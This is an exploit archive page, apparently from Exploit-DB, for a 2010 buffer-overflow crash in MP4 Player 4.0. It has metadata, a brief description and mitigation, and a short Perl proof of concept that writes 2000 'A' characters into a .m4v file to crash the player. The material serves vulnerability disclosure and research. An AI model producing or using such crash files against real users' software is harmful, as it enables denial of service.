header-logo
Suggest Exploit
vendor:
MP4 Player
by:
SarBoT511
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: MP4 Player
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mp4_player:mp4_player:4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2010

MP4 Player 4.0 Local Crash Poc

This exploit is a buffer overflow vulnerability in MP4 Player 4.0. It allows an attacker to crash the application by creating a malicious .m4v file with 2000 'A' characters. The malicious file is then opened with the application, causing it to crash.

Mitigation:

Input validation should be used to prevent buffer overflow attacks.
Source

Exploit-DB raw data:

#!usr/bin/perl
#Exploits title :[MP4 Player 4.0 Local Crash Poc]
#Date : [2010/01/02]
#Aouther : [SarBoT511]
#downloads :[http://mp4-player.ivefound.com]
#tested on :[win xp sp2]
#MP4 Player 4.0
#Greatz [2] :{ aB0 M0haM3d and lezr crew }

$file="SarBoT511.m4v";
$boom="A" x 2000;
open(myfile,">>$file");
print myfile $boom;
close(myfile);
print "Done ..! ~#";